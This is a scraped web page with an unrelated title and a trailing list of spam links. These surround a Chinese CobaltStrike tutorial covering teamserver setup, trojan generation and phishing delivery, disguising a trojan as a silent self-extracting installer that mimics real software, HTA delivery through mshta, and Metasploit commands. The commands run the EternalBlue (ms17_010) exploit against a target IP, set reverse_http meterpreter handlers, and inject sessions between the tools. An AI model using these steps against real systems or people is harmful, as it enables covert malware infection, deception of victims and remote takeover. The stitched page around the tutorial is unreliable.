当前位置: 首页 > news >正文

网站版权设置弹出快捷菜单一般通过

网站版权设置,弹出快捷菜单一般通过,做安居客网站需要什么浏览器,长沙建网站联系电话目录 CobaltStrike简介 主要功能#xff1a; 使用注意#xff1a; 在使用CobaltStrike进行渗透测试时#xff0c;务必遵守法律法规#xff0c;并获得合法授权。 CobaltStrike安装 前提 安装 服务端安装 windows安装 CS基本使用 监听器配置 一些基本的攻击…目录 CobaltStrike简介 主要功能 使用注意        在使用CobaltStrike进行渗透测试时务必遵守法律法规并获得合法授权。 CobaltStrike安装 前提 安装 服务端安装 windows安装 CS基本使用 监听器配置 一些基本的攻击 生成木马靶机上线此次演示木马生成在自己的电脑上然后双击启动木马 ​编辑 木马的伪装自解压安装包设置 生成hta文件靶机上线 CS和MSF联动 CS会话传递到MSF上 设置外部监听器 配置msfmsf运行之后会获取会话 设置监听转移选择外部监听器 结果 msf会话传递至CS上 首先先利用msf上线一台靶机 cs设置监听 msf设置派生 结果 CobaltStrike简介 CobaltStrike简称CS是一款专业的团队作战渗透测试工具包含客户端和服务端两个部分。以下是关于CobaltStrike的简单介绍 主要功能 持久化、横向移动在已经取得攻击目标控制权后CobaltStrike能够用于在目标系统中保持长期存在并进行横向移动扩大攻击范围。 流量隐藏通过其独特的技术手段CobaltStrike可以有效地隐藏网络流量使攻击行为难以被检测和追踪。 数据窃取CobaltStrike还具备数据窃取能力能够从目标系统中提取敏感信息。 使用注意         在使用CobaltStrike进行渗透测试时务必遵守法律法规并获得合法授权。 CobaltStrike安装 前提 在安装CobaltStrike时设备上需要部署jdk8以上的环境 安装 服务端安装在kali或者云服务器上客户端安装在Windows上 服务端安装 下列演示为在kali中安装 将CobaltStrike安装包中服务端拖进kali中 在kali桌面文件夹中找到CobaltStrike以下统称CS找到teamserver文件修改文件权限为文件添加执行权限 chmod x teamserver 执行该文件 ./teamserver 本机ip地址 自己设置的密码 后面会出现如下图所示界面 windows安装 打开CS的客户端点击如下图框起来的地方 开始会有如下弹窗 之后会有如下弹窗下列弹窗中Host填写Server端 IP地址Port设置为服务端设置端口Password设置服务端中设置密码User自己随意设置然后点击连接 然后就会出现如下图所示图片 这样就安装成功了 CS基本使用 监听器配置 在CS客户端中点击如下图所示图案 添加会话 一些基本的攻击 生成木马靶机上线此次演示木马生成在自己的电脑上然后双击启动木马 木马也可以配合钓鱼攻击生成连接诱导被攻击点击 选择创建位置 测试是否成功下列图片测试成功的图片可以打开机器的文件目录并且对其进行操作 木马的伪装自解压安装包设置 选择一个木马程序和一个常用的软件使用winrar软件进行压缩选择自解压压缩格式选择的这个格式可以让后缀变为exe 点击高级,选择自解压选项 选择解压路径,是一个别人都能访问的路径 ,windows所有人都有的路径就是C:UsersPublic 按照下图设置解压方式 选择解压方式静默解压 选择更新模式和覆盖模式 设置图标 然后点击确定就可以了然后再修改一下文件名称他会生成一个如下图所示文件上面的是正版下面的是盗版。是不是很像 上述步骤出来的自解压安装包是会被杀毒软件发现的。如果上述安装包再配合一些其他黑客技术就可以进行一些。。。 生成hta文件靶机上线 点击生成hta文件 设置监听和脚本语言 设置监听端口 设置监听端口和hta文件 设置完成后会给你一串网址 复制地址在靶机上使用mshta进行运行 靶机上线成功 上线之后就可以提权进行下一步渗透了 CS和MSF联动 CS会话传递到MSF上 设置外部监听器 配置msfmsf运行之后会获取会话 msf6 use exploit/multi/handler#下面代码与你在CS中配置有关#payload对应外部监听的payloadlhost配置的是本地地址lpost要和监听器相同msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_httpmsf6 exploit(multi/handler) set lhost 192.168.244.141msf6 exploit(multi/handler) set lport 8085 设置监听转移选择外部监听器 结果 会话成功转移到了msf上 msf会话传递至CS上 首先先利用msf上线一台靶机 这里用的是永恒之蓝漏洞上线的一台windows7靶机 msf6 use exploit/windows/smb/ms17_010_eternalblue #设置攻击主机 msf6 exploit(windows/smb/ms17_010_eternalblue) set rhosts 192.168.244.146 #设置监听端口 msf6 exploit(windows/smb/ms17_010_eternalblue) set lport 8081 #攻击 msf6 exploit(windows/smb/ms17_010_eternalblue) run cs设置监听 msf设置派生 在MSF中exploit/windows/local/payload_inject 模块通常用于在已经获得Windows系统shell访问权限的情况下向该系统的另一个进程注入一个payload。 #使用该模块可以将 Metasploit 获取到的会话注入到CS中 use exploit/windows/local/payload_inject #和cs监听器保持一致 set payload windows/meterpreter/reverse_http #可以不设置但是端口不要和CS冲突了。 set prependmigrate true # msf所在主机IP set lhost xxxx #CS上的listen端口 set lport XXX #要转发的session set session 2 run 结果 会话已被cs获取
http://www.w-s-a.com/news/596864/

相关文章:

  • 襄阳网站建设需要多少钱台州网站设计公司网站
  • 东莞专业拍摄做网站照片如何在百度上发布自己的广告
  • 网站建设费 科目做网站建设最好学什么
  • php商城网站建设多少钱深圳市建设
  • 有什么做糕点的视频网站黄岛做网站
  • 做视频课程网站建设一个普通网站需要多少钱
  • 专做化妆品的网站合肥做网站建设公司
  • 唐山企业网站网站建设费计入那个科目
  • 企业网站制作运营彩虹云主机官网
  • 如何建设废品网站如何在阿里云云服务器上搭建网站
  • 如何建立网站后台程序wordpress 后台管理
  • 山东外贸网站建设怎么样wordpress首页左图右文
  • 志丹网站建设wordpress 形式修改
  • 南通seo网站推广费用网站建设就业前景
  • 自适应网站做mip改造浏览器广告投放
  • 网站meta网页描述网站的推广费用
  • 偃师市住房和城乡建设局网站网站个人主页怎么做
  • 做网站要实名认证吗wordpress去掉仪表盘
  • 在哪做网站好Python建网站的步骤
  • 卢松松的网站办公室设计布局
  • 住房城乡建设干部学院网站织梦网站0day漏洞
  • 企业网站seo优帮云手机桌面布局设计软件
  • 无证做音频网站违法吗智能建站加盟电话
  • 鹿泉专业网站建设做网站为什么要建站点
  • 加强网站建设和维护工作新闻大全
  • 红鱼洞水库建设管理局网站左右左布局网站建设
  • 手机网站建设地址做网站公
  • 贵州建设厅网站首页网络公司除了做网站
  • 运动鞋建设网站前的市场分析wordpress 搜索框代码
  • app开发网站开发教程平台网站开发的税率